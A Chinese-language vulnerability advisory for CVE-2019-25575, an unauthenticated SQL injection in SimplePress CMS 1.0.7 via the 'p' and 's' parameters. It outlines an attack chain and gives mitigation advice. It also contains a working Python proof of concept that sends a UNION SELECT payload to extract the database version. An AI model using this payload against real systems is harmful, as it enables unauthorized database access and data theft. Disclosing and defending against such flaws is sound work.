CVE-2019-25575 CVSS 8.2 高危

CVE-2019-25575 SimplePress CMS SQL注入漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25575

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SimplePress CMS

漏洞概述

SimplePress CMS 1.0.7 版本中存在严重的SQL注入漏洞。该漏洞允许未经身份验证的攻击者利用'p'和's'参数注入恶意SQL代码，从而执行任意数据库查询。攻击者可以通过发送特制的GET请求，从数据库中提取敏感信息，如用户名、数据库名称及版本详情，对系统安全构成严重威胁。

技术细节

该漏洞的根本原因在于 SimplePress CMS 在处理用户输入时存在安全缺陷。具体来说，应用程序在处理 GET 请求中的 'p' 和 's' 参数时，未对这些参数进行严格的类型检查或有效的输入过滤，导致其被直接拼接到后端的 SQL 查询语句中执行。由于系统未对未认证用户进行访问限制（PR:N），攻击者可以通过网络向受影响端点发送特制的 HTTP GET 请求。攻击 payload 通常包含 SQL 注入语法（如单引号闭合、UNION 查询或布尔盲注语句），这使得后端数据库服务器误解析并执行攻击者的恶意指令。利用此漏洞，攻击者可以窃取数据库中的敏感信息（如用户名、密码哈希、数据库版本等），甚至可能通过堆叠查询写入恶意数据，严重威胁系统的机密性和完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，识别出运行 SimplePress CMS 1.0.7 的服务器。

STEP 2

2. 漏洞探测

攻击者向服务器发送包含 SQL 注入测试语法的 GET 请求，测试 'p' 和 's' 参数是否存在过滤缺陷。

STEP 3

3. 恶意利用

确认漏洞存在后，攻击者构造恶意的 SQL Payload（如 UNION SELECT），通过参数注入并在数据库中执行。

STEP 4

4. 数据窃取

利用数据库返回的结果，攻击者提取敏感数据（如管理员账号密码、数据库结构等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url):
    """
    PoC for CVE-2019-25575 SimplePress CMS SQL Injection
    Vulnerable parameters: 'p' and 's'
    """
    # Payload to extract database version using UNION based SQL injection
    # Note: The number of columns might need adjustment based on the specific query
    payload = {
        "p": "1",
        "s": "1' UNION SELECT 1, version(), 3, 4, 5-- -"
    }

    try:
        response = requests.get(target_url, params=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}")
            print(f"[+] Payload: {payload}")
            print("[+] Response snippet:")
            print(response.text[:500]) # Display part of the response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1/simplepress/index.php"
    exploit_sqli(target)

影响范围

SimplePress CMS 1.0.7

防御指南

临时缓解措施

如果无法立即升级，建议在 Web 应用防火墙（WAF）中添加规则，拦截包含常见 SQL 注入特征（如单引号、UNION、SELECT 等）的请求参数。同时，应严格限制对 CMS 后台及数据库端口的网络访问，仅允许受信任的 IP 地址连接，并监控异常的数据库查询流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表